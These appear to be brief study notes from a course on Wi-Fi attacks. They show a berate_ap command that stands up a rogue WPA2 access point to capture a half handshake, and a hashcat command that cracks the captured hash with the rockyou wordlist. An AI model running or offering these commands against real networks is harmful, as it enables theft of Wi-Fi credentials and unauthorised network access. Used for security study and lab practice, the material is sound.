Half Handshake Attack

./berate_ap -m bridge wlan0 eth0 -w 2 --mana-wpa --colour fakeAP testpass

# m -> method for internet sharing (Nat, bridge)
# > make wlan0 take internet from eth0
# w -> refer to the enctyption is WPA2
image.png

Half handshake was stored in file call hostapd.hccapx in /tmp directory


then crack hash

hashcat -m 2500 /tmp/ **hostapd.hccapx /tmp/rockyou.txt**
2025-06-17 00_13_47-Capture Wi-Fi Passwords with a Half-Handshake Attack _ Mahara-Tech - Brave.png

Try to search how to run hashcat on GPU not on CPU

Last updated